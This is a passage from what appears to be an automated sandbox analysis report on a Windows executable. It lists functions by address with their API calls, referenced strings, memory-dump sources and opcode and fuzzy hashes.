                                                                                                                                                • Opcode ID: 789fa19b01885c4af587ae6ecda65b783609ad18778648db5a4db7e6d7096403
                                                                                                                                                • Instruction ID: 4c57fe7f1e18b69ce279228fb34a654e40b0c99fb66e3e12e5c9deb0a4398986
                                                                                                                                                • Opcode Fuzzy Hash: 789fa19b01885c4af587ae6ecda65b783609ad18778648db5a4db7e6d7096403
                                                                                                                                                • Instruction Fuzzy Hash: DF51C131A0521A9BDF24DF698805AFF37B4FB45300F1A843BE801E6281D73CA9019B7A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004BEDA2, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 119COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • Read callback asked for PAUSE when not supported!, xrefs: 004BEE2F
                                                                                                                                                • read function returned funny value, xrefs: 004BEE69
                                                                                                                                                • operation aborted by callback, xrefs: 004BEE00
                                                                                                                                                • %x%s, xrefs: 004BEE9A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strlen$__fprintf_l
                                                                                                                                                • String ID: %x%s$Read callback asked for PAUSE when not supported!$operation aborted by callback$read function returned funny value
                                                                                                                                                • API String ID: 3363873489-1291304620
                                                                                                                                                • Opcode ID: 0c14bb68cda72c121dd238d4f42e3c468b134e32b59a2be5673f48ec76506c6b
                                                                                                                                                • Instruction ID: f97c96560d3cecf0482a383f2ab3123e6201ccee3bce326b73556931e6f4161b
                                                                                                                                                • Opcode Fuzzy Hash: 0c14bb68cda72c121dd238d4f42e3c468b134e32b59a2be5673f48ec76506c6b
                                                                                                                                                • Instruction Fuzzy Hash: 01417131A0070AAFDB24DF75C846BFFB7E4EB45314F10082BE115E6291D779A941CBAA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004029FA, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004036C6: CharNextW.USER32(?,00402A0A,?,00000000,?,?,?,00402613,>%@,00000000,00000000,?,?,0040253E,?), ref: 004036E0
                                                                                                                                                • CharNextW.USER32(00000000,00000000,?,00000000,?,?,?,00402613,>%@,00000000,00000000,?,?,0040253E,?), ref: 00402A2F
                                                                                                                                                • CharNextW.USER32(?,?,00000000,?,?,?,00402613,>%@,00000000,00000000,?,?,0040253E,?), ref: 00402AA1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CharNext
                                                                                                                                                • String ID: >%@
                                                                                                                                                • API String ID: 3213498283-1335591167
                                                                                                                                                • Opcode ID: a3d116ac5adabef441316b3be795912d12ea8691a95733785c63b3d49299a1d6
                                                                                                                                                • Instruction ID: b6eb42ca2683454257c8e1a55ebec0d5e3a90e68dfc023e433ffb598e63648c9
                                                                                                                                                • Opcode Fuzzy Hash: a3d116ac5adabef441316b3be795912d12ea8691a95733785c63b3d49299a1d6
                                                                                                                                                • Instruction Fuzzy Hash: 48319570610205DADB359F68CA8862673F5EF55345B20497AD482E73E0EBF89C81DB58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041E0C4, Relevance: 12.1, APIs: 8, Instructions: 122COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,?,00000000), ref: 0041E110
                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,00000000), ref: 0041E163
                                                                                                                                                • _memset.LIBCMT ref: 0041E187
                                                                                                                                                • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000103,?,?,00000000), ref: 0041E19D
                                                                                                                                                • _memset.LIBCMT ref: 0041E1B6
                                                                                                                                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,00000000,?,00000103,?,?,00000000), ref: 0041E1CB
                                                                                                                                                • CloseHandle.KERNEL32(?,?,00000000), ref: 0041E216
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process$FileNameOpen_memset$CloseHandleImageModule
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3232383893-0
                                                                                                                                                • Opcode ID: cf3912897c502f488d78aecd238ab0166fdab61408618d831e02ba115a03c713
                                                                                                                                                • Instruction ID: 657f5ccb1dfabb98e09bf9e305fc2cee047b27dc6773b891247375200f2a9edd
                                                                                                                                                • Opcode Fuzzy Hash: cf3912897c502f488d78aecd238ab0166fdab61408618d831e02ba115a03c713
                                                                                                                                                • Instruction Fuzzy Hash: 1941A375901119ABDB21EF96CC84EEFBBBCEF09740F0044A7F914E2241D7749A84CBA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041CCB9, Relevance: 12.1, APIs: 8, Instructions: 75libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 0041CCDD
                                                                                                                                                • LoadLibraryW.KERNEL32(00720065,?,00000000,00000001), ref: 0041CCF7
                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000001), ref: 0041CD0B
                                                                                                                                                • _memset.LIBCMT ref: 0041CD2F
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0069006E,?,?,000000FF,00000000,00000000,?,?,?,?,00000000,00000001), ref: 0041CD4B
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0041CD5F
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 0041CD70
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,00000001), ref: 0041CD80
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLastLibrary_memset$AddressByteCharFreeLoadMultiProcWide
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4119534970-0
                                                                                                                                                • Opcode ID: c40a7030b3d53e4e9b87a62c9b74c04810048f342e3782ac6fe2ec1ba0146418
                                                                                                                                                • Instruction ID: 2fb12d689ec714ac9dd689cc18539adb3c3af748d9c1c0cbd22b3caf518b20f1
                                                                                                                                                • Opcode Fuzzy Hash: c40a7030b3d53e4e9b87a62c9b74c04810048f342e3782ac6fe2ec1ba0146418
                                                                                                                                                • Instruction Fuzzy Hash: 53215CB4940208EFDB20DFA4DCC8EAABBBCEB45345F108479F446D2250DB74AE84CB25
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0049EFFC, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 220COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __sopen_s
                                                                                                                                                • String ID: $UNICODE$UTF-16LE$UTF-8$ccs=
                                                                                                                                                • API String ID: 2693426323-1656882147
                                                                                                                                                • Opcode ID: 8e8c74975080f7586b63864f13058e3d038b84c678b82ca6f12493de93a9ac56
                                                                                                                                                • Instruction ID: aee8d32a10fc81a569d3d0f89df44b7290bd0d0fa66e8397671c8021ecd751e8
                                                                                                                                                • Opcode Fuzzy Hash: 8e8c74975080f7586b63864f13058e3d038b84c678b82ca6f12493de93a9ac56
                                                                                                                                                • Instruction Fuzzy Hash: 4771C0B1804249EEEF14CF65C4467AA7FA4AB01314F24C17FE855D6261D3BDCE4A8F8A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004A4531, Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __mtinitlocknum.LIBCMT ref: 004A4548
                                                                                                                                                  • Part of subcall function 00499D78: __FF_MSGBANNER.LIBCMT ref: 00499D94
                                                                                                                                                • __lock.LIBCMT ref: 004A455C
                                                                                                                                                • __lock.LIBCMT ref: 004A45A5
                                                                                                                                                • ___crtInitCritSecAndSpinCount.LIBCMT ref: 004A45C0
                                                                                                                                                • EnterCriticalSection.KERNEL32(00000115,00500580,00000018,004A7B7B,00000109,00000000,00000000), ref: 004A45E6
                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000115), ref: 004A45F3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CriticalSection__lock$CountCritEnterInitLeaveSpin___crt__mtinitlocknum
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2236623020-0
                                                                                                                                                • Opcode ID: 16288d5d8e1b583d407033526fac1ce6db200be079829911def2eb2cc772eee3
                                                                                                                                                • Instruction ID: 7a80893970b20621454f6715ebba4b43c28b54dddb025f6a903ad8d929293821
                                                                                                                                                • Opcode Fuzzy Hash: 16288d5d8e1b583d407033526fac1ce6db200be079829911def2eb2cc772eee3
                                                                                                                                                • Instruction Fuzzy Hash: B941D531D007069BDB249F69D8457AE7BE0AFE3324F14821EE122962D1CBBC99818B59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00416218, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041621D
                                                                                                                                                  • Part of subcall function 0048EA0D: _malloc.LIBCMT ref: 0048EA25
                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 004162A1
                                                                                                                                                • lstrlenA.KERNEL32(?,00000000,00000001,?), ref: 004162D0
                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000001,?), ref: 004162FF
                                                                                                                                                  • Part of subcall function 004112D8: MultiByteToWideChar.KERNEL32(?,00000000,AYA,000000FF,?,00000001,00415941,00000000,00000001,004C555A,?,?,?,?,?), ref: 004112F7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen$ByteCharH_prologMultiWide_malloc
                                                                                                                                                • String ID: name$path
                                                                                                                                                • API String ID: 124735866-3269492902
                                                                                                                                                • Opcode ID: 953cd90c2ff49b05e2939c8810fcf699e975528252ac066a9b16590229944e88
                                                                                                                                                • Instruction ID: ab7f9b131b277d0288684c74194887842d9b7ef69a1e277874c61d9958d353c5
                                                                                                                                                • Opcode Fuzzy Hash: 953cd90c2ff49b05e2939c8810fcf699e975528252ac066a9b16590229944e88
                                                                                                                                                • Instruction Fuzzy Hash: 1531A332900109ABCB01ABA9C8429FEBA75EB44354F25452BE910E7291D73ACD81DB89
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00416366, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041636B
                                                                                                                                                  • Part of subcall function 0048EA0D: _malloc.LIBCMT ref: 0048EA25
                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 004163EF
                                                                                                                                                • lstrlenA.KERNEL32(?,00000000,00000001,?), ref: 0041641E
                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000001,?), ref: 0041644D
                                                                                                                                                  • Part of subcall function 004112D8: MultiByteToWideChar.KERNEL32(?,00000000,AYA,000000FF,?,00000001,00415941,00000000,00000001,004C555A,?,?,?,?,?), ref: 004112F7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen$ByteCharH_prologMultiWide_malloc
                                                                                                                                                • String ID: name$path
                                                                                                                                                • API String ID: 124735866-3269492902
                                                                                                                                                • Opcode ID: 2b1379dd941fd9a3c2835b26950df1fdb94fd1a7bc5ff9ead382658d454331d1
                                                                                                                                                • Instruction ID: e956cf8bee30bc6acae8370fa1abac9b18f57f61ee8bfbe267f64a5198a38653
                                                                                                                                                • Opcode Fuzzy Hash: 2b1379dd941fd9a3c2835b26950df1fdb94fd1a7bc5ff9ead382658d454331d1
                                                                                                                                                • Instruction Fuzzy Hash: FB31D332900108ABCB11AFA9C842AFEBA75EF44314F21452BE814E7291DA39DD919BCD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004026E8, Relevance: 10.6, APIs: 7, Instructions: 111stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 004026ED
                                                                                                                                                • lstrlenW.KERNEL32(?,00000000), ref: 00402710
                                                                                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 0040272B
                                                                                                                                                • CharNextW.USER32(00000000,?,00000000), ref: 00402751
                                                                                                                                                • CharNextW.USER32(?,00000000,?,00000000), ref: 00402772
                                                                                                                                                • CoTaskMemFree.OLE32(?,?,00000000), ref: 00402790
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CharFreeNextTask$H_prologlstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3222259607-0
                                                                                                                                                • Opcode ID: fd582510c98aa593ae9e700a5ab6423728ab93496bda3429df7b88ccdd9ddc15
                                                                                                                                                • Instruction ID: bf85d203292337b042d4c94f44cf534f8756a145e100ead1a4606b81971c466e
                                                                                                                                                • Opcode Fuzzy Hash: fd582510c98aa593ae9e700a5ab6423728ab93496bda3429df7b88ccdd9ddc15
                                                                                                                                                • Instruction Fuzzy Hash: 0B415F76900216DBCB11AF64CE49A6E77B4EF05301B10817BE811FB2D1DBF889418BA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041CFFC, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFileIcmp
                                                                                                                                                • String ID: Data Buffer
                                                                                                                                                • API String ID: 232071827-3400854472
                                                                                                                                                • Opcode ID: d746ae784caf847b719b4c7cdc92ccc1d04de4fbd3f642302f1c398549c91646
                                                                                                                                                • Instruction ID: 2c2064d82b25bd1a76943e088142f16c9c597893a75f35a44a72cb591e4f9e15
                                                                                                                                                • Opcode Fuzzy Hash: d746ae784caf847b719b4c7cdc92ccc1d04de4fbd3f642302f1c398549c91646
                                                                                                                                                • Instruction Fuzzy Hash: D621CFB1D00204AADF20BB65C845BEE7F649F4932DF10029BF914671C2CBBC9A86969D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0049AD78, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • TlsGetValue.KERNEL32(00000000,0049AE28), ref: 0049AD85
                                                                                                                                                • TlsGetValue.KERNEL32(FFFFFFFF), ref: 0049AD9C
                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 0049ADB1
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0049ADCC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Value$AddressHandleModuleProc
                                                                                                                                                • String ID: DecodePointer$KERNEL32.DLL
                                                                                                                                                • API String ID: 1929421221-629428536
                                                                                                                                                • Opcode ID: 2d95c44aa3d27881ea6566f7c617da3120886c970fc5c6bce8f442c96740ad53
                                                                                                                                                • Instruction ID: 73a17e3b1eaf2a9809db141c8d34a438ee437dde9e8d5138dee38852e7795d5d
                                                                                                                                                • Opcode Fuzzy Hash: 2d95c44aa3d27881ea6566f7c617da3120886c970fc5c6bce8f442c96740ad53
                                                                                                                                                • Instruction Fuzzy Hash: DDF036305402169BCF519B65DC08A5F3EA5AFC13917158276F804E2770DB29DC21D6DF
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0049AD01, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • TlsGetValue.KERNEL32(00000000,0049AD76,00000000,004A63D6,00000000,00000000,00000314,?,?,?,0050EDB8,0049AB82,0050EDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0049AD0E
                                                                                                                                                • TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,0050EDB8,0049AB82,0050EDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0049AD25
                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0050EDB8,0049AB82,0050EDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0049AD3A
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0049AD55
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Value$AddressHandleModuleProc
                                                                                                                                                • String ID: EncodePointer$KERNEL32.DLL
                                                                                                                                                • API String ID: 1929421221-3682587211
                                                                                                                                                • Opcode ID: c06ba28ce6c86742b292ae637f93359bffb58a2410e0317e15ba9f6db384d5e1
                                                                                                                                                • Instruction ID: ce1f9e2141655c5ae5db363b91788a4ddc7115172e8f8301d67d0b652bf55fc6
                                                                                                                                                • Opcode Fuzzy Hash: c06ba28ce6c86742b292ae637f93359bffb58a2410e0317e15ba9f6db384d5e1
                                                                                                                                                • Instruction Fuzzy Hash: BCF036345002129FCF519B35DC0496B3EA5AF803567198676F814E2774DF39DC2196EB
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004B728F, Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 417COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
